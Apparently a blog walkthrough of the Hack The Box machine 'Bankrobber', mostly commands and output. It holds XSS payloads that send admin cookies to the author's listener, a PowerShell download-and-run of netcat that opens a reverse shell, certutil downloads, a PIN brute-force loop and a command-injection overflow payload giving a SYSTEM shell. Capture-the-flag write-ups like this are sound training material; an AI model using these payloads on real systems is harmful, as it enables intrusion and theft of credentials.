htb-bankrobber-nl

As always, first an nmap scan

root @ kali: ~ / htb / bankrobber # nmap -A 10.10.14.5 -oN AllPorts
Starting Nmap 7.80 (https://nmap.org) at 2020-02-03 06:24 EST
Nmap scan report for 10.10.14.5
Host is up (0.000051s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22 / tcp open ssh OpenSSH 7.9p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 2048 85: 9c: 65: 7b: ec: db: 65: ee: 28: 91: c7: 2e: 2f: e0: 22: 06 (RSA)
| 256 72: bb: d3: 17: 56: d4: 0d: fe: cb: 3e: 64: c9: 5c: 7a: 41: a6 (ECDSA)
| _ 256 66: 62: 0f: 03: e5: d8: 7f: e1: e8: dd: f2: ab: 17: 4c: a1: fc (ED25519)
111 / tcp open rpcbind 2-4 (RPC # 100000)
| rpcinfo:
| program version port / proto service
| 100000 2,3,4 111 / tcp rpcbind
| 100000 2,3,4 111 / udp rpcbind
| 100000 3.4 111 / tcp6 rpcbind
| _ 100000 3.4 111 / udp6 rpcbind
8000 / tcp open http SimpleHTTPServer 0.6 (Python 3.7.4)
| _http-server-header: SimpleHTTP / 0.6 Python / 3.7.4
| _http-title: Directory listing for /
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe: / o: linux: linux_kernel: 3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe: / o: linux: linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 12.88 seconds

Now we first create a new user, and then log in as this user

Then catch the admin cookie

<script> new Image (). src = "http://10.10.14.5:8000/bogus.php?output=" + document.cookie; </script>

or

<script> <img src = x onerror = this.src = 'http: //10.10.14.5: 8000 /? c =' + document.cookie> </script>
root @ kali: ~ / htb / # python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.154 - - [29 / Jan / 2020 03:24:29] code 404, message File not found
10.10.10.154 - - [29 / Jan / 2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP / 1.1" 404 -

then send an xss powershell iwr script

<script type = "text / javascript"> var Http = new XMLHttpRequest (); var url = '/ admin / backdoorchecker.php'; var params = 'cmd = dir | powershell -c "iwr -uri http://10.10.14.5:8000/nc64.exe -outfile% temp% \ a.exe";% temp% \ a.exe -e cmd.exe 10.10.14.5 1111 '; Http .open ("POST", url, true); Http.setRequestHeader ('Content-Type', 'application / x-www-form-urlencoded'); Http.send (params); </script>

If necessary, we check whether the admin auto apporoved (not necessarily necessary, only for checking)

first edit the admin cookie

catch the user shell

root @ kali: ~ / htb / bankrobber # rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.154] 54090
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C: \ xampp \ htdocs \ admin> whoami
whoami
bank robber \ cortin

C: \ xampp \ htdocs \ admin> cd c: \ users \ Cortin \ Desktop 
C: \ Users \ Cortin \ Desktop> type user.txt
type user.txt
f635346600876a43441cf1c6e94769ac

.

c: \ mkdir temp 
c: \ temp \ certutil -urlcache -split -f http://10.10.14.10:8000/plink.exe c: \ Temp \ plink.exe 
. \ plink.exe -R 3306: 127.0.0.1 : 3306 10.10.14.10
root @ kali: ~ / htb / bankrobber # mysql -u root -h 127.0.0.1 -p
Enter password: 
Welcome to the MariaDB monitor. Commands end with; or \ g.
Your MariaDB connection id is 1019
Server version: 10.1.38-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\ h' for help. Type '\ c' to clear the current input statement.

MariaDB [(none)]> show databases;
+ -------------------- +
| Database |
+ -------------------- +
| bank robber |
| information_scheme |
| mysql |
| performance_scheme |
| phpmyadmin |
| test |
+ -------------------- +
6 rows in set (0.091 sec)

MariaDB [(none)]> select LOAD_FILE ('/ Users / Administrator / Desktop / root.txt');
MariaDB [(none)]> select LOAD_FILE ('/ Users / Cortin / Desktop / user.txt');

.

later after forcing the pin (after plink reverse shell c: \ temp \ plink.exe -R 4466: 127.0.0.1: 910 10.10.14.5 )

with script

or

root @ kali: ~ / htb / bankrobber # cat bandit.sh 
for x in {0..9} {0..9} {0..9} {0..9}; do
echo $ x | nc 192.168.1.139 910 | egrep -v "correct";
echo "Try $ x"; 
done

turned out to be this: 0021

C: \ temp \ certutil -urlcache -split -f http://10.10.14.5:8000/nc64.exe c: \ temp \ nc64.exe

C: \ temp \ certutil -urlcache -split -f http://10.10.14.5:8000/plink.exe c: \ temp \ plink.exe 
. \ Plink.exe -R 4466: 127.0.0.1: 910 10.10.14.5
.
root @ kali: ~ / htb / bankrobber # netstat -ano | grep 4455
tcp 0 0 127.0.0.1:4455 0.0.0.0:* LISTEN off (0.00 / 0/0)
tcp6 0 0 :: 1: 4455 ::: * LISTEN off (0.00 / 0/0)

root @ kali: ~ / htb / bankrobber # nc 127.0.0.1 4455 
 ----------------------------------- --------------------------- Internet E-Coin Transfer System International Bank of Sun church v0.1 by Gio & Cneeliz ----- -------------------------------------------------- ------- Please enter your super secret 4 digit PIN code to login: [$] 0021 [$] PIN is correct, access granted! -------------------------------------------------- ------------ Please enter the amount of e-coins you would like to transfer: [$] 1 [$] Transfering $ 1 using our e-coin transfer application. [$] Executing e-coin transfer tool: C: \ Users \ admin \ Documents \ transfer.exe [$] Transaction in progress, you can safely disconnect ...

c: \ bankv2.exe is Vulnerable to an ”Integer Overflow”

it appeared after asking on forum that it was about 32 A characters

I used numbers instead of A’s so:
12345678901234567890123456789012

after this the payload must be executed

My payload was –
12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236

root @ kali: ~ / htb / bankrobber # nc 127.0.0.1 4455
-------------------------------------------------- ------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
-------------------------------------------------- ------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN correct, access granted!
-------------------------------------------------- ------------
Please enter the amount of e-coins you would like to transfer:
[$] 12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236
[$] Transfer $ 12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236 using our e-coin transfer application. 
[$] Executing e-coin transfer tool: C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236

[$] Transaction in progress, you can safely disconnect ...
root @ kali: / opt / evil-winrm # rlwrap nc -nlvp 1236
listening on [any] 1236 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.154] 49759
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C: \ Windows \ system32> whoami
whoami
nt authority \ system

C: \ Windows \ system32> cd c: \ users \ admin \ desktop
cd c: \ users \ admin \ desktop

c: \ Users \ admin \ Desktop> type root.txt
type root.txt
aa65d8e6216585ea636eb07d4a59b197
c: \ Users \ admin \ Desktop>

Author: Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *